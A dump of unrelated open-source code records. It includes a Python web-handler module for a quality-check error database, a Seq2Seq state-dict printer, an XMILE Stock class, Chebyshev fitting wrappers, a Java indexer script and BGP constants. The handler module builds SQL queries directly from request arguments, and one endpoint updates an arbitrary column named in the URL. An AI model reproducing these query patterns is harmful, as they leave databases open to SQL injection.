Inclusion by Parsimony and Transcript Distribution (RIPTiDe)',\n\tauthor='Matthew Jenior',\n\tauthor_email='mattjenior@gmail.com',\n\turl='https://github.com/mjenior/riptide',\n\tpackages=find_packages(),\n install_requires=['cobra','symengine','scipy'],\n license='MIT',\n long_description_content_type='text/markdown',\n long_description=long_description)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"325324291","text":"from tools import db\n\nfrom tools.time_convert import *\nfrom tools.sql_mk import where_in\nfrom tools.network import url_req\nimport time\nimport copy\nfrom local_utils import *\nfrom local_utils import _group_by\nimport json\nfrom urllib.parse import quote\n\n\nspecial_auther_list = [\"shanghai\", \"zhejiang\"]\nauther_not_in = \", \".join([\"'%s'\" % special_auther for special_auther in special_auther_list])\n\n\ndef group_edit_error(self, group_id):\n check_date = self.get_argument(\"date\", \"\")\n check_date_end = self.get_argument(\"date_end\", \"\")\n status = self.get_argument(\"status\", \"99\")\n jd_status = self.get_argument(\"jd_status\", \"99\")\n auther = self.get_argument(\"auther\", \"default_auther\")\n channel = self.get_argument(\"channel\", \"\")\n error_level = self.get_argument(\"error_level\", \"\")\n key_word = self.get_argument(\"key_word\", \"\")\n res = get_group_edit_error(check_date, group_id, status, check_date_end, jd_status, auther, channel, error_level, key_word)\n self.write(json.dumps(res))\n\n\ndef get_group_edit_error(check_date, group_id, status, check_date_end, jd_status, auther, channel, error_level,\n key_word):\n # st = today_begin() if check_date == \"\" else time_str_to_ts(check_date + \" 00:00:00\")\n # et = st + 86400 if check_date_end == \"\" else time_str_to_ts(check_date_end + \" 00:00:00\")\n st = time_str_to_ts(check_date + \" 00:00:00\") if check_date != \"\" else \"\"\n if check_date_end != \"\":\n et = time_str_to_ts(check_date_end + \" 00:00:00\")\n elif st != \"\":\n et = st + 86400\n else:\n et = \"\"\n gp_sql = \"1=1\" if int(group_id) == 0 else \"t_edit_err_info.gp = %s \" % group_id\n st_sql = '1=1' if str(status) == \"99\" else 'status %s' % (where_in(status.split(\",\")))\n jst_sql = '1=1' if int(jd_status) == 99 else 'admin_judge = %s' % (jd_status)\n auther_sql = '1=1' if auther == \"default_auther\" else \"auther = '%s'\" % (auther)\n if channel == \"\":\n channel_sql = '1=1'\n else:\n try :\n resp_channel_list = js_load_req(\"http://172.16.198.126/manage/index/getNewChannelList?&name={}\".format(quote(channel)))[\"data\"]\n channel_list_temp = [item[\"channel\"] for item in resp_channel_list]\n channel_sql = 'channel %s' % where_in(channel_list_temp)\n #172.16.198.126 47.96.182.117\n url_temp = \"http://172.16.198.126/manage/index/getNewChannelList?&name={}\".format(quote(channel))\n print(url_temp)\n print(url_req(url_temp))\n resp_channel_list = js_load_req(url_temp)[\"data\"]\n channel_list_temp = [item[\"channel\"] for item in resp_channel_list]\n channel_sql = 'channel %s' % where_in(channel_list_temp)\n except Exception as err:\n channel_sql = '1=1'\n\n# channel_sql = '1=1' if channel == \"\" else 'channel = \"%s\"' % (channel)\n error_level_sql = '1=1' if error_level == \"\" else 'error_level = %s' % (error_level)\n kw_sql = \"1=1\" if key_word == \"\" else '`desc` like \"%{}%\"'.format(key_word)\n if st == \"\" and et == \"\":\n where_sql = \"where %s and `desc` != '质检完成' and status != 99\" % (' and '.join([gp_sql, st_sql, jst_sql, auther_sql, channel_sql, error_level_sql, kw_sql]))\n else:\n where_sql = \"where %s and create_time between '%s' and '%s' and `desc` != '质检完成' and status != 99\" % (' and '.join([gp_sql, st_sql, jst_sql, auther_sql, channel_sql, error_level_sql, kw_sql]), ts_to_time_str(st), ts_to_time_str(et))\n res = db.query(\"select id , channel , end , status , err_count count , start , start check_date , auther submit_user ,gp , create_time ,sys_err , `desc` , error_level level ,admin_judge, entry_clerk from t_edit_err_info %s order by start\" % (where_sql), \"db_qc\")\n ch_name_map = get_channel_name_map([i[\"channel\"] for i in res])\n res_ch_man = js_load_req(\"http://dmp.hz-data.com/Admin/CutTask/tqc_media_permission\")[\"mediaList\"]\n item = {}\n for row in res_ch_man:\n item[str(row[\"fmediaid\"])] = row[\"wx_alias\"] if row[\"wx_alias\"] is not None else \"\"\n for i in res:\n i[\"channel_canme\"] = ch_name_map.get(i[\"channel\"], \"??\")\n i[\"count\"] = int(i[\"count\"])\n # i[\"create_time\"] = i[\"create_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n i[\"create_time\"] = str(i[\"create_time\"])\n i[\"check_date\"] = ts_to_time_str(int(i[\"check_date\"]), \"%Y-%m-%d\")\n i[\"sys_err\"] = \"yes\" if i[\"sys_err\"] == 1 else \"no\"\n if i[\"submit_user\"] == \"录入退回\" and i[\"entry_clerk\"] is not None and i[\"entry_clerk\"].strip() != \"\":\n i[\"submit_user\"] = i[\"submit_user\"] + \"_\" + i[\"entry_clerk\"]\n if str(i[\"gp\"]) == \"90\":\n i[\"principal\"] = item.get(str(i[\"channel\"]), \"\")\n return {\"total\": len(res), 'rows': res}\n\n\ndef edit_error_submit(self, channel_id, start, end):\n try:\n err_count = int(self.get_argument(\"count\"))\n except:\n err_count = 1\n\n start ,end = int( start ) , int( end )\n desc = self.get_argument( \"reason\" ) \n auther = self.get_argument( \"submit_user\" ) \n error_level = self.get_argument( \"level\" , '0' ) \n sys_err = 1 if self.get_argument( \"sys_err\" ,\"no\" ) == \"yes\" else 0\n entry_clerk = self.get_argument(\"entry_clerk\", \"\")\n \n # 上海传入基本都为一整天 从0:0:0-23:59:59 强制转为7200s\n # if auther in special_auther_list and end-start >= 83000:\n # end = start + 72000\n \n gp = db.query(\"select edit_lock.group gp from edit_lock where channel = '%s' \" % (channel_id), \"db\")[0][\"gp\"]\n\n # 插入数据前根据 channel, start, end, desc 做去重判断\n sql_select = \"select id from t_edit_err_info where `channel` = '%s' and `start` = '%s' and `end` = '%s' and `desc` = '%s' and status != 99\" % (\n channel_id, start, end, desc)\n res = db.query(sql_select, \"db_qc\")\n if res:\n sql_update = \"update t_edit_err_info set err_count = '%s', auther = '%s', gp = '%s', sys_err = '%s', error_level = '%s', entry_clerk = '%s', create_time = '%s' where id = '%s'\" % (\n err_count, auther, gp, sys_err, error_level, entry_clerk, ts_to_time_str(time.time()), res[-1]['id'])\n ret = db.query(sql_update, \"db_qc\")\n else:\n ret = db.query(\n \"insert into t_edit_err_info (channel, start, `end`, err_count, `desc`, auther, gp, sys_err, error_level, entry_clerk) values('%s', %s, %s, %s, '%s', '%s', %s , %s , %s, '%s')\" % (\n channel_id, start, end, err_count, desc, auther, gp, sys_err, error_level, entry_clerk), \"db_qc\")\n if desc != \"质检完成\" and auther not in(\"录入退回\", \"客户退回\"):\n db.query(\"update status_monitor set edit_flag = 7, edit_time = now(), judge_flag = -1, judge_time = now(), sync_flag = 0, sync_time = now(), dmp_flag = 0, dmp_time = now() where channel = '%s' and day = '%s'\" % (channel_id, ts_to_time_str(int(start))[:10]), \"db\")\n ret_write(self, ret=0, data=ret)\n\n\ndef edit_error_update(self, err_id, status):\n db.query(\"update t_edit_err_info set status = %s where id = %s \" % (status, err_id), \"db_qc\")\n auther = db.query(\"select auther from t_edit_err_info where id = %s \" % (err_id), \"db_qc\")[0][\"auther\"]\n if -1 == int(status) and auther == 'shanghai':\n info = db.query(\"select channel, start , end from t_edit_err_info where id = %s \" % (err_id), \"db_qc\")[0]\n ret = url_req(\"http://dmp.hz-data.com/Api/ShIssue/push_finish_backtask\", post_str=\"mediaid=%s&issuedate=%s\" % (\n info[\"channel\"], ts_to_time_str((info[\"end\"] + info[\"start\"]) / 2, \"%Y-%m-%d\")))\n ret_write(self, ret=0)\n\n\ndef edit_error_kv_update(self, err_id, key, value):\n db.query(\"update t_edit_err_info set %s = %s where id = %s \" % (key, value, err_id), \"db_qc\")\n ret_write(self, ret=0)\n\n\ndef edit_error_info(self, channel_id, start, end):\n start, end = float(start), float(end)\n ret = db.query(\n \"select id , start ,end , err_count count , auther user , `desc` , create_time , status , error_level level from t_edit_err_info where channel = '%s' and start between %s and %s and auther not in (%s) and err_count > 0 and status != 2 and status != 99\" % (\n channel_id, start - 2222, end, auther_not_in), \"db_qc\")\n ret = list(filter(lambda x: seg_join_length(x[\"start\"], x[\"end\"], start, end) >= 1, ret))\n for i in ret:\n i[\"start\"] = ts_to_time_str(i[\"start\"])\n i[\"end\"] = ts_to_time_str(i[\"end\"])\n i[\"create_time\"] = i[\"create_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n ret_write(self, ret=0, data=ret)\n\n\ndef edit_error_rank(self, start_date, end_date):\n res = edit_error_summary(start_date, end_date)\n res = sorted(res, reverse=True, key=lambda x: x[\"err_perc\"])\n if res[9][\"err_perc\"] <= 0.05:\n res = res[:10]\n else:\n res = list(filter(res, lambda x: x[\"err_perc\"] > 0.05))\n ret_write(self, data=res)\n\n\ndef edit_error_work(self, checker_name, check_date):\n year, month = int(check_date[:4]), int(check_date[4:])\n if month == 12:\n year2, month2 = year + 1, 1\n else:\n year2, month2 = year, month + 1\n sql = \"select * from t_edit_err_info where auther = '%s' and create_time between '%.4d-%.2d-01 00:00:00' and '%.4d-%.2d-01 00:00:00' and status != 99\" % (\n checker_name, year, month, year2, month2)\n res = db.query(\n \"select channel , create_time , err_count from t_edit_err_info where auther = '%s' and create_time between '%.4d-%.2d-01 00:00:00' and '%.4d-%.2d-01 00:00:00' and status != 99\" % (\n checker_name, year, month, year2, month2), \"db_qc\")\n info = {}\n for i in res:\n key = i[\"create_time\"].strftime(\"%Y-%m-%d\")\n if key in info:\n info[key][\"channel\"] = info[key][\"channel\"] + 1\n info[key][\"err_count\"] = info[key][\"err_count\"] + i[\"err_count\"]\n else:\n info[key] = {\"channel\": 1, \"err_count\": i[\"err_count\"], \"date\": key}\n ret_write(self, data=list(info.values()))\n\n\ndef edit_error_summary(s_date, e_date, gp=\"\"):\n if \"\" == gp:\n ch_sql = \"1=1\"\n err_query = \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql)\n else:\n ch_sql = \"gp = %s \" % gp\n err_query = \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s and sys_err = 0 order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql)\n\n s_date = s_date + \" 00:00:00\"\n e_date = e_date + \" 23:59:59\"\n\n res = db.query(err_query, \"db_qc\")\n # res = db.query( \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther !='shanghai' and %s and sys_err = 0 order by channel , start \" % ( s_date, e_date , ch_sql ), \"db_qc\" )\n\n ret = []\n ch_info_map = {i[\"channel\"]: i for i in\n db.query(\"select channel , edit_lock.group gp ,channel_cname from edit_lock \", \"db\")}\n res = _group_by(res, key_func=lambda x: \"%s_%s\" % (x[\"channel\"], ts_to_time_str(x[\"start\"], \"%Y-%m-%d\")))\n for key, info in res.items():\n ch, data_date = key.split(\"_\")\n if ch not in ch_info_map: continue\n last_create_time = max([x[\"create_time\"] for x in info])\n err_sum = sum([x[\"err_count\"] for x in info])\n day_st = time_str_to_ts(data_date + \" 00:00:00\")\n day_et = day_st + 86400\n summary_num = db.query(\n \"select count( *) num from summary where channel = '%s' and start between %s and %s and tag in ( 0,1,3,4 ) and create_time <'%s' \" % (\n ch, day_st, day_et, last_create_time), \"db\")[0][\"num\"]\n if 0 != err_sum:\n err_perc = err_sum / (err_sum + summary_num)\n else:\n err_perc = 0.0\n ret.append({\"check_date\": info[0][\"create_time\"].strftime(\"%Y-%m-%d\"),\n \"data_date\": data_date,\n \"err_count\": err_sum,\n \"summary_count\": summary_num,\n \"channel\": ch,\n \"gp\": info[0][\"gp\"],\n \"sys_err\": 0,\n \"channel_cname\": ch_info_map[ch][\"channel_cname\"],\n \"err_perc\": err_perc})\n\n ret = sorted(ret, key=lambda x: x[\"err_perc\"], reverse=True)\n if \"\" == gp: return ret\n\n res2 = db.query(\n \"select * from t_edit_err_info where create_time between '%s' and '%s' and status in ( - 1, 0 ,1, 3 ) and auther not in (%s) and %s and sys_err = 1 order by channel , start \" % (\n s_date, e_date, auther_not_in, ch_sql), \"db_qc\")\n\n filled_data = list(res.keys())\n\n for x in res2:\n key = \"%s_%s\" % (x[\"channel\"], ts_to_time_str(x[\"start\"], \"%Y-%m-%d\"))\n if key in filled_data: continue\n filled_data.append(key)\n ret.append({\"check_date\": x[\"create_time\"].strftime(\"%Y-%m-%d\"),\n \"data_date\": ts_to_time_str(x[\"start\"], \"%Y-%m-%d\"),\n \"err_count\": x[\"err_count\"],\n \"summary_count\": 0,\n \"channel\": x[\"channel\"],\n \"sys_err\": 1,\n \"gp\": x[\"gp\"],\n \"channel_cname\": ch_info_map[x['channel']][\"channel_cname\"],\n \"err_perc\": 0})\n return ret\n\n\nfrom local_utils import _err_ansi_range\n\n\ndef _edit_task_exists(channel_id, start, end):\n return sum([x[1] - x[0] for x in _err_ansi_range(channel_id, start, end)]) > 3\n\n\n# print( edit_error_summary( \"2019-08-23\" , \"2019-08-27\" ,\"\" ) )\n\n\ndef err_check_status(self):\n res = db.query(\n \"select channel ,start ,gp ,status from t_edit_err_info where auther = 'psp' and create_time > '%s' order by status , channel \" % (\n ts_to_time_str(time.time() - 86400)), \"db_qc\")\n ch_name_map = get_channel_name_map([i[\"channel\"] for i in res])\n for x in res:\n x['ch_name'] = ch_name_map[x['channel']]\n x['day'] = ts_to_time_str(x['start'], '%Y-%m-%d')\n x['status'] = '完成' if x['status'] == -1 else '未完成'\n del x['start']\n self.write(json.dumps(res))\n\n\nfrom local_utils import _group_by\n\n\ndef edit_error_checker(self, start_date, end_date):\n info = db.query(\n 'select channel , admin_judge ,auther , status from t_edit_err_info where create_time between \"%s 00:00:00\" and \"%s 00:00:00\" and `desc` != \"质检完成\" and status != 99' % (\n start_date, end_date), 'db_qc')\n info2 = db.query(\n 'select channel , admin_judge ,auther , status from t_edit_err_info where create_time between \"%s 00:00:00\" and \"%s 00:00:00\" and status != 99' % (\n start_date, end_date), 'db_qc')\n auther_list = set([x['auther'] for x in info])\n au_gp_auther = _group_by(info, lambda x: x['auther'])\n au_gp_auther2 = _group_by(info2, lambda x: x['auther'])\n res = {x: {'auther': x, 'total': len(au_gp_auther[x])} for x in au_gp_auther}\n for auther in res:\n ch_info2 = list(filter(lambda x: auther == x['auther'], info2))\n res[auther]['ch_count'] = len(set([x['channel'] for x in ch_info2])) # the confirmed data also shall be marked\n ch_info = list(filter(lambda x: auther == x['auther'], info))\n res[auther]['not_error'] = len(list(filter(lambda data: 1 == data['status'], ch_info)))\n res[auther]['admin_judge_err'] = len(list(filter(lambda data: 1 == data['admin_judge'], ch_info)))\n res[auther]['effective'] = len(\n list(filter(lambda x: x['status'] in (-1, 0, 3) and 0 == x['admin_judge'], ch_info)))\n res[auther]['perc'] = '{}%'.format(int(float(res[auther]['effective']) * 100 / res[auther]['total']))\n\n ret = {'count': len(res), 'rows': sorted(res.values(), key=lambda x: x['auther'])}\n self.write(json.dumps(ret))\n\n\ndef group_sync_error(self):\n channel = self.get_argument(\"channel\", \"\")\n date_start = self.get_argument(\"date_start\", \"\")\n date_end = self.get_argument(\"date_end\", \"\")\n channel_sql = \"1=1\" if channel == \"\" else \"channel = '%s'\" % channel\n date_start_sql = \"1=1\" if date_start == \"\" else \"day >= '%s'\" % date_start\n date_end_sql = \"1=1\" if date_end == \"\" else \"day <= '%s'\" % date_end\n sql = \"select channel, monitor_err_info, update_time from post_process_day_job where recheck_status = 2 and %s\" % \" and \".join([channel_sql, date_start_sql, date_end_sql])\n res = db.query(sql, 'db')\n # print(res)\n ch_name_map = get_channel_name_map(list(set([i[\"channel\"] for i in res])))\n res_sync = []\n for row in res:\n dict_item = json.loads(row[\"monitor_err_info\"])\n for key, value in dict_item.items():\n for item in value[\"data_list\"]:\n item[\"admin_judge\"] = 0\n item[\"channel_canme\"] = ch_name_map.get(item[\"channel\"], \"??\")\n item[\"count\"] = 1\n item[\"desc\"] = key\n item[\"sys_err\"] = \"yes\"\n item[\"submit_user\"] = \"sync_monitor\"\n item[\"status\"] = \"0\"\n item[\"create_time\"] = str(row[\"update_time\"])\n item[\"gp\"] = \"\"\n item[\"entry_clerk\"] = \"\"\n res_sync.append(item)\n self.write(json.dumps({\"total\": len(res_sync), 'rows': res_sync}))\n\n\nhandler_list = [\n (r'/group_edit_error/(?P.*)/', mk_req_handler(get=group_edit_error)),\n (r'/edit_error_summary/(?P.*)/(?P.*)/', mk_req_handler(get=lambda self, start, end: ret_write(self, data=edit_error_summary(start, end, self.get_argument(\"group\", \"\"))))),\n (r'/edit_error_submit/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(post=edit_error_submit)),\n (r'/edit_error_update/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_update)),\n (r'/edit_error_kv_update/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_kv_update)),\n (r'/edit_error_info/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_info)),\n (r'/edit_error_rank/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_rank)),\n (r'/edit_error_work/(?P.*)/(?P.*)/', mk_req_handler(get=edit_error_work)),\n (r'/edit_error_checker/(?P.*)/(?P.*)/', mk_req_handler3(get=edit_error_checker)),\n (r'/edit_task_exists/(?P.*)/(?P.*)/(?P.*)/', mk_req_handler(get=lambda self, channel_id, start, end: ret_write(self, 0 if _edit_task_exists(channel_id, int(start), int(end)) else 1))),\n (r'/err_check_status/', mk_req_handler(get=err_check_status)),\n (r'/group_sync_error/', mk_req_handler(get=group_sync_error))\n]\n","sub_path":"py_interface/123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":18705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"495291572","text":"# validate state dict, TO BE DELETED\nimport torch\nimport math\nfrom utils import Vocab, OOVDict, Batch, format_tokens, Dataset\nfrom model import DEVICE, Seq2SeqOutput, Seq2Seq\nfrom params import Params\n\ndef print_dict():\n p = Params()\n dataset = Dataset(\n p.data_path,\n max_src_len=p.max_src_len,\n max_tgt_len=p.max_tgt_len,\n truncate_src=p.truncate_src,\n truncate_tgt=p.truncate_tgt,\n )\n v = dataset.build_vocab(p.vocab_size, embed_file=p.embed_file)\n m = Seq2Seq(v, p)\n m.load_state_dict(torch.load(\"state_dict.pth\"))\n m.eval()\n print(\"state dict\")\n print(m.state_dict())\n\nprint_dict()","sub_path":"Well Log Mnemonics/aliaser/print_state_dict.py","file_name":"print_state_dict.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"470360720","text":"from src.formalismos.xmile.Inflow import Inflow\nfrom src.formalismos.xmile.Outflow import Outflow\nfrom src.utils.auxiliares.Equation import Equation\n\n\nclass Stock(object):\n def __init__(self, stock_element, source_xmlns, parent, sim_specs, dimensions, debug):\n self.debug = debug\n self.sim_specs = sim_specs\n self.dimensions = dimensions\n self.parent = parent\n self.source_xmlns = source_xmlns\n self.stock_element = stock_element\n self.name = self.get_name()\n self.access = self.get_access()\n self.equation = self.get_equation()\n self.outflows = self.get_outflows()\n self.inflows = self.get_inflows()\n self.nonNegative = self.get_non_negative()\n \n def __repr__(self):\n return str({\n 'parent' : self.parent,\n 'name' : self.name,\n 'access' : self.access,\n 'equation' : self.equation,\n 'outflows' : self.outflows,\n 'inflows' : self.inflows,\n 'nonNegative' : self.nonNegative\n })\n \n def __str__(self):\n return str({\n 'parent' : self.parent,\n 'name' : self.name,\n 'access' : self.access,\n 'equation' : self.equation,\n 'outflows' : self.outflows,\n 'inflows' : self.inflows,\n 'nonNegative' : self.nonNegative\n })\n \n def get_name(self):\n name = self.stock_element.get('name')\n if name is None:\n raise Exception('Error: todos los stocks deben tener nombre')\n return name\n \n def get_access(self):\n access = self.stock_element.get('access')\n if access is None:\n return None\n if self.debug:\n print('El stock ' + self.parent + '.' + self.name + ' es de acceso tipo ' + access)\n return access\n \n def get_equation(self):\n equation = self.stock_element.find(self.source_xmlns + 'eqn').text\n if equation == '':\n raise Exception('Error: hay una ecuacion definida sin ningun simbolo (invalida) en' + self.name)\n return Equation(equation, self.sim_specs, self.dimensions, self.name, self.debug)\n \n def get_outflows(self):\n outflows = self.stock_element.findall(self.source_xmlns + 'outflow')\n return list(map(lambda x : Outflow(x, self.source_xmlns, self.debug), outflows))\n \n def get_inflows(self):\n inflows = self.stock_element.findall(self.source_xmlns + 'inflow')\n return list(map(lambda x : Inflow(x, self.source_xmlns, self.debug), inflows))\n \n def get_non_negative(self):\n nonNegative = self.stock_element.find('non_negative')\n if nonNegative is None:\n return 0\n return 1\n\n def get_equation_variables(self):\n return self.equation.get_variables()","sub_path":"src/formalismos/xmile/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425970845","text":" # put your python code here\na = int(input())\nb = int(input())\nc = []\n\nfor n in range(a, b + 1):\n if n % 3 == 0:\n c.append(n)\n\nprint(sum(c) / len(c))\n","sub_path":"Problems/The average of all numbers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"447026156","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\n#\n# Copyright (c) 2008-2014, Christoph Gohlke\n# Copyright (c) 2008-2014, The Regents of the University of California\n# Produced at the Laboratory for Fluorescence Dynamics\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holders nor the names of any\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\"\"\"Fit exponential and harmonic functions using Chebyshev polynomials.\n\n:Author:\n `Christoph Gohlke `_\n\n:Organization:\n Laboratory for Fluorescence Dynamics, University of California, Irvine\n\n:Version: 2013.01.18\n\nRequirements\n------------\n* `CPython 2.7 or 3.3 `_\n* `Numpy 1.7 `_\n* `Chebyfit.c 2013.01.18 `_\n* `Matplotlib 1.2 `_ (optional for plotting)\n\nReferences\n----------\n(1) Analytic solutions to modelling exponential and harmonic functions using\n Chebyshev polynomials: fitting frequency-domain lifetime images with\n photobleaching. G C Malachowski, R M Clegg, and G I Redford.\n J Microsc. 2007; 228(3): 282-295. doi: 10.1111/j.1365-2818.2007.01846.x\n\nExamples\n--------\n>>> import chebyfit\n\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom dlab._chebyshev import forward_transform, inverse_transform, polynomials\nfrom dlab._chebyshev import normalization_factors, polynomial_roots\n\n\ndef fit_exponentials(data, n_exps, n_coef=6, dt=1.0, axis=-1):\n \"\"\"Fit data to a sum of one or more exponential functions\n\n Parameters\n ----------\n data : 1-D or 2-D array\n The data to be fit\n n_exps : int\n The number of exponentials to fit to the data\n n_coef : int\n The number of coefficients used to fit the data. Must be >=6 and < 64.\n dt : float\n The sampling rate of the data. Used to scale the returned time constant(s)\n axis : int\n If data.dim is > 1, specify the time dimension\n\n Returns\n -------\n dict\n {offset, amplitude, lifetime}\n array\n The fitted data\n\n \"\"\"\n from dlab._chebyshev import fitexps\n params, fitted = fitexps(data, n_exps, n_coef, deltat=dt, axis=axis)\n return (\n {\n \"offset\": params[..., 0],\n \"amplitude\": params[..., 1:(1 + n_exps)],\n \"lifetime\": params[..., (1 + n_exps):(1 + 2 * n_exps)]\n },\n fitted)\n\n\ndef fit_harmonic_decay(data, n_coef=6, dt=1.0, axis=-1):\n \"\"\"Fit data to a harmonic exponential decay function\n\n Parameters\n ----------\n data : 1-D or 2-D array\n The data to be fit\n n_coef : int\n The number of coefficients used to fit the data. Must be >= 6. More is better.\n dt : float\n The sampling rate of the data. Used to scale the returned time constant(s)\n axis : int\n If data.dim is > 1, specify the time dimension\n\n Returns\n -------\n dict\n {offset, amplitude, lifetime, frequency}\n array\n The fitted data\n \"\"\"\n from dlab._chebyshev import fitexpsin\n params, fitted = fitexpsin(data, n_coef, deltat=dt, axis=axis)\n return params, fitted\n return ({\"offset\": params[..., 0],\n \"amplitude\": params[..., 1:3],\n \"lifetime\": params[..., 3],\n \"frequency\": params[..., 4]},\n fitted)\n","sub_path":"dlab/chebyshev.py","file_name":"chebyshev.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"40404357","text":"import sys \nimport os\nfrom antlr4 import *\nfrom indexer.JavaLexer import JavaLexer\nfrom indexer.JavaParser import JavaParser\nfrom indexer.JavaSourceIndexer import JavaSourceIndexer\nfrom math import sqrt\nfrom indexer.DB import DB\nimport rpy2.robjects as R\n\ndef coSim(x, y):\n dot = 0 \n for v in range(len(x)):\n dot += x[v]*y[v]\n len1 = 0\n for v in x:\n len1 += (v**2)\n len1 = sqrt(len1)\n len2 = 0\n for v in y:\n len2 += (v**2)\n len2 = sqrt(len2) \n\n return dot/(len1*len2)\n\ntheTestFiles = dict()\ndef main(args):\n theDB = DB(\":memory:\")\n for no, pe, files in os.walk(args[1]):\n for f in files:\n print(\"indexing: \" + args[1] + \"/\" + f)\n inputData = FileStream(args[1] + \"/\" + f)\n lexer = JavaLexer(inputData)\n tokens = CommonTokenStream(lexer)\n parser = JavaParser(tokens) \n tree = parser.compilationUnit()\n\n theFileID = -1\n with open(args[1] + \"/\" + f, 'r') as tehFile:\n theFileID = theDB.putFile(tehFile.read())[0]\n\n tokenList = JavaSourceIndexer(theDB, theFileID).visit(tree)\n #print(tokenList)\n theTestFiles[f] = tokenList\n \n problems = theTestFiles.keys()\n problems.sort() \n \n finds = 0.0\n total = 0.0\n\n diffSims = []\n sameSims = []\n\n for i in range(len(problems)):\n sameSim = 0\n sameCount = 0\n diffSim = 0\n diffCount = 0\n for j in range(len(problems)):\n if problems[j][:problems[j].find(\".\")] == problems[i][:problems[i].find(\".\")] and problems[j] != problems[i]:\n sameSim += coSim(theTestFiles[problems[i]], theTestFiles[problems[j]])\n sameCount += 1\n else:\n diffSim += coSim(theTestFiles[problems[i]], theTestFiles[problems[j]])\n diffCount += 1\n sameSim /= sameCount\n diffSim /= diffCount\n if sameSim > diffSim:\n finds += 1.0\n else:\n print(problems[i] + \" was more similar to arbitrary code than to mutations of \" + problems[i])\n total += 1.0\n\n diffSims.append(diffSim)\n sameSims.append(sameSim)\n \n \n print(str(finds/total) + \" percent of files were more similar to mutations of themselves than to arbitary code.\")\n \n\n\n # t-test\n\n res = R.r['t.test'](R.FloatVector(sameSims), R.FloatVector(diffSims))\n \n print(\"The p-value of a student's t test, testing the difference in similarity between mutations of code, and arbitrary code is:\")\n print(res.rx('p.value')[0][0])\n\n print(\"The 95% confidence interval of the difference is:\")\n print(res.rx('conf.int')[0])\n \nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"VersionAlpha0.0.1/performanceEstimator/JavaIndexer.py","file_name":"JavaIndexer.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"346975237","text":"# bgp.constants.py\n# Copyright (c) 2007-2018 by Mark Bergsma \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\nBGP constants as used by several BGP modules\n\"\"\"\n\n# Constants\nVERSION = 4\nPORT = 179\n\nHDR_LEN = 19\nMAX_LEN = 4096\n\n# BGP messages\nMSG_OPEN = 1\nMSG_UPDATE = 2\nMSG_NOTIFICATION = 3\nMSG_KEEPALIVE = 4\n\n# BGP FSM states\nST_IDLE, ST_CONNECT, ST_ACTIVE, ST_OPENSENT, ST_OPENCONFIRM, ST_ESTABLISHED = range(6)\n\nstateDescr = {\n 